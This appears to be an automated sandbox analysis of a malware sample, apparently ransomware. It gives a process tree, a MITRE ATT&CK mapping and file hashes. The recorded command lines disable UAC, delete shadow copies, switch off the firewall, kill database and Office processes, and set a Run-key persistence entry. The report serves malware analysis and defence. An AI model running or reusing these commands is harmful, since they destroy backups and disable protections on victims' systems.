- C:\Windows\SysWOW64\nslookup.exe (tree level 3)
  Command line: nslookup myip.opendns.com. resolver1.opendns.com
- C:\Windows\SysWOW64\cmd.exe (tree level 2)
  Command line: C:\Windows\system32\cmd.exe /c echo %date%-%time%
- C:\Windows\SysWOW64\cmd.exe (tree level 2)
  Command line: C:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"
  - Suspicious use of WriteProcessMemory
- C:\Windows\SysWOW64\systeminfo.exe (tree level 3)
  Command line: systeminfo
  - Gathers system information
- C:\Windows\SysWOW64\find.exe (tree level 3)
  Command line: find /i "os name"
- C:\Windows\SysWOW64\cmd.exe (tree level 2)
  Command line: C:\Windows\system32\cmd.exe /c systeminfo|find /i "original"
  - Suspicious use of WriteProcessMemory
- C:\Windows\SysWOW64\systeminfo.exe (tree level 3)
  Command line: systeminfo
  - Gathers system information
- C:\Windows\SysWOW64\find.exe (tree level 3)
  Command line: find /i "original"
- C:\Windows\SysWOW64\cmd.exe (tree level 2)
  Command line: C:\Windows\system32\cmd.exe /c reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes
- C:\Windows\SysWOW64\reg.exe (tree level 3)
  Command line: reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
  - Modifies registry key
- C:\Windows\SysWOW64\Wbem\WMIC.exe (tree level 3)
  Command line: wmic shadowcopy delete
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\SysWOW64\netsh.exe (tree level 3)
  Command line: netsh advfirewall set currentprofile state off
- C:\Windows\SysWOW64\netsh.exe (tree level 3)
  Command line: netsh firewall set opmode mode=disable
- C:\Windows\SysWOW64\netsh.exe (tree level 3)
  Command line: netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes
- C:\Windows\SysWOW64\cmd.exe (tree level 2)
  Command line: C:\Windows\system32\cmd.exe /c taskkill /im notepad.exe&taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskkill /im mydesktopqos.exe&taskkill /im isqlplussvc.exe&taskkill /im xfssvccon.exe&taskkill /im mydesktopservice.exe&taskkill /im ocautoupds.exe&taskkill /im agntsvc.exe&taskkill /im encsvc.exe&taskkill /im firefoxconfig.exe&taskkill /im tbirdconfig.exe&taskkill /im ocomm.exe&taskkill /im mysqld.exe&taskkill /im mysqld-nt.exe&taskkill /im mysqld-opt.exe&taskkill /im dbeng50.exe&taskkill /im sqbcoreservice.exe&taskkill /im excel.exe&taskkill /im infopath.exe&taskkill /im msaccess.exe&taskkill /im mspub.exe&taskkill /im onenote.exe&taskkill /im outlook.exe&taskkill /im powerpnt.exe&taskkill /im steam.exe&taskkill /im thebat.exe&taskkill /im thebat64.exe&taskkill /im thunderbird.exe&taskkill /im visio.exe&taskkill /im winword.exe&taskkill /im wordpad.exe
- C:\Windows\SysWOW64\taskkill.exe (tree level 3)
  Command line: taskkill /im notepad.exe
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\SysWOW64\taskkill.exe (tree level 3)
  Command line: taskkill /im msftesql.exe
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\SysWOW64\taskkill.exe (tree level 3)
  Command line: taskkill /im sqlagent.exe
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\SysWOW64\taskkill.exe (tree level 3)
  Command line: taskkill /im sqlbrowser.exe
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\SysWOW64\taskkill.exe (tree level 3)
  Command line: taskkill /im sqlservr.exe
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\SysWOW64\taskkill.exe (tree level 3)
  Command line: taskkill /im sqlwriter.exe
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\SysWOW64\taskkill.exe (tree level 3)
  Command line: taskkill /im oracle.exe
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\SysWOW64\taskkill.exe (tree level 3)
  Command line: taskkill /im ocssd.exe
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\SysWOW64\taskkill.exe (tree level 3)
  Command line: taskkill /im dbsnmp.exe
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\SysWOW64\taskkill.exe (tree level 3)
  Command line: taskkill /im synctime.exe
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\SysWOW64\taskkill.exe (tree level 3)
  Command line: taskkill /im agntsvc.exe
  - Kills process with taskkill
- C:\Windows\SysWOW64\taskkill.exe (tree level 3)
  Command line: taskkill /im mydesktopqos.exe
  - Kills process with taskkill
- C:\Windows\SysWOW64\taskkill.exe (tree level 3)
  Command line: taskkill /im isqlplussvc.exe
  - Kills process with taskkill
- C:\Windows\SysWOW64\taskkill.exe (tree level 3)
  Command line: taskkill /im xfssvccon.exe
  - Kills process with taskkill
- C:\Windows\SysWOW64\taskkill.exe (tree level 3)
  Command line: taskkill /im mydesktopservice.exe
  - Kills process with taskkill
- C:\Windows\SysWOW64\taskkill.exe (tree level 3)
  Command line: taskkill /im ocautoupds.exe
  - Kills process with taskkill
- C:\Windows\SysWOW64\taskkill.exe (tree level 3)
  Command line: taskkill /im agntsvc.exe
  - Kills process with taskkill
- C:\Windows\SysWOW64\taskkill.exe (tree level 3)
  Command line: taskkill /im encsvc.exe
  - Kills process with taskkill
- C:\Windows\SysWOW64\taskkill.exe (tree level 3)
  Command line: taskkill /im firefoxconfig.exe
  - Kills process with taskkill
- C:\Windows\SysWOW64\taskkill.exe (tree level 3)
  Command line: taskkill /im tbirdconfig.exe
  - Kills process with taskkill
- C:\Windows\SysWOW64\taskkill.exe (tree level 3)
  Command line: taskkill /im ocomm.exe
  - Kills process with taskkill
- C:\Windows\SysWOW64\taskkill.exe (tree level 3)
  Command line: taskkill /im mysqld.exe
  - Kills process with taskkill
- C:\Windows\SysWOW64\taskkill.exe (tree level 3)
  Command line: taskkill /im mysqld-nt.exe
  - Kills process with taskkill
- C:\Windows\SysWOW64\taskkill.exe (tree level 3)
  Command line: taskkill /im mysqld-opt.exe
  - Kills process with taskkill
- C:\Windows\SysWOW64\taskkill.exe (tree level 3)
  Command line: taskkill /im dbeng50.exe
  - Kills process with taskkill
- C:\Windows\SysWOW64\taskkill.exe (tree level 3)
  Command line: taskkill /im sqbcoreservice.exe
  - Kills process with taskkill
- C:\Windows\SysWOW64\taskkill.exe (tree level 3)
  Command line: taskkill /im excel.exe
  - Kills process with taskkill
- C:\Windows\SysWOW64\taskkill.exe (tree level 3)
  Command line: taskkill /im infopath.exe
  - Kills process with taskkill
- C:\Windows\SysWOW64\taskkill.exe (tree level 3)
  Command line: taskkill /im msaccess.exe
  - Kills process with taskkill
- C:\Windows\SysWOW64\taskkill.exe (tree level 3)
  Command line: taskkill /im mspub.exe
  - Kills process with taskkill
- C:\Windows\SysWOW64\taskkill.exe (tree level 3)
  Command line: taskkill /im onenote.exe
  - Kills process with taskkill
- C:\Windows\SysWOW64\taskkill.exe (tree level 3)
  Command line: taskkill /im outlook.exe
  - Kills process with taskkill
- C:\Windows\SysWOW64\taskkill.exe (tree level 3)
  Command line: taskkill /im powerpnt.exe
  - Kills process with taskkill
- C:\Windows\SysWOW64\taskkill.exe (tree level 3)
  Command line: taskkill /im steam.exe
  - Kills process with taskkill
- C:\Windows\SysWOW64\taskkill.exe (tree level 3)
  Command line: taskkill /im thebat.exe
  - Kills process with taskkill
- C:\Windows\SysWOW64\taskkill.exe (tree level 3)
  Command line: taskkill /im thebat64.exe
  - Kills process with taskkill
- C:\Windows\SysWOW64\taskkill.exe (tree level 3)
  Command line: taskkill /im thunderbird.exe
  - Kills process with taskkill
- C:\Windows\SysWOW64\taskkill.exe (tree level 3)
  Command line: taskkill /im visio.exe
  - Kills process with taskkill
- C:\Windows\SysWOW64\taskkill.exe (tree level 3)
  Command line: taskkill /im winword.exe
  - Kills process with taskkill
- C:\Windows\SysWOW64\taskkill.exe (tree level 3)
  Command line: taskkill /im wordpad.exe
  - Kills process with taskkill
- C:\Windows\SysWOW64\cmd.exe (tree level 2)
  Command line: C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f&reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f
- C:\Windows\SysWOW64\reg.exe (tree level 3)
  Command line: reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f
- C:\Windows\SysWOW64\reg.exe (tree level 3)
  Command line: reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f
  - Modifies registry key
- C:\Windows\SysWOW64\cmd.exe (tree level 2)
  Command line: C:\Windows\system32\cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f&reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f
- C:\Windows\SysWOW64\reg.exe (tree level 3)
  Command line: reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f
  - Adds Run key to start application
  - Modifies registry key
- C:\Windows\SysWOW64\reg.exe (tree level 3)
  Command line: reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f
  - Adds Run key to start application
- C:\Windows\system32\MusNotifyIcon.exe (tree level 1)
  Command line: %systemroot%\system32\MusNotifyIcon.exe NotifyTrayIcon 13
  - Checks processor information in registry
- C:\Windows\System32\svchost.exe (tree level 1)
  Command line: C:\Windows\System32\svchost.exe -k NetworkService -p
  - Drops file in Windows directory
  - Modifies data under HKEY_USERS
- C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe (tree level 1)
  Command line: C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
  - Drops file in Windows directory
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\vssvc.exe (tree level 1)
  Command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Persistence
- Modify Existing Service (1)
- Registry Run Keys / Startup Folder (1)
- Scheduled Task (1)
Defense Evasion
- Bypass User Account Control (1)
- Disabling Security Tools (1)
- Modify Registry (3)
- File Deletion (1)
Downloads
- C:\Users\Admin\AppData\h4_svc.bat
  MD5
  ead5cad574fa019df970900e07e76afd
  SHA1
  2bf7be0a9b3f174eaccd0a89310699f7b15fed02
  SHA256
  7de41bf6be3b821fb2ff4a2f8b7f6772d407c0bdf1bccfd9c19207ab1f07440f
  SHA512
  16aa662012c6ed8c50cb45f0487ff10081201c0091ccd86b4ae5235e72ef696a188f9acb5f91e8a59b95cac7b5d8b1c89328f32714f51d201db94e0a0aae5c87
- C:\Users\Admin\AppData\t2_svc.bat
  MD5
  702f5dc6f9dec28c8c9b7b6885c9fe09
  SHA1
  dbb85da6de899deb21ce0a8f25c1726cd19e49e8
  SHA256
  20bf5224af318c449407c99e5f4628f71b874463a1cb777031a43b6236ab97e9
  SHA512
  fa4bfc3ac77561585d03bf62e7bb4de0602cf442b5c54b70945f8c75114d111559f50ad36026e2bb1027323f7f50130b7c60bee22835400a8a07feab436ccff7
- C:\Users\Admin\AppData\v9_svc.vbs
  MD5
  e9c50acda9063b2462697bdbd0a0dfe2
  SHA1
  d1a2bc54905ce0e9121f8e5c249e0527f2190b7e
  SHA256
  f236c75a867944ce27e123b3aaf3a465084bc6135dc453f7f4aacb1cbf9946bd
  SHA512
  d5cd841b82867e323f5cd28f97c9a27ea32be1b3793cb7ddff1ccc3c0559c6b3758f6366d259eda2265431f67a1eebe41dcfb2047ee94c515eb458af6311b8a9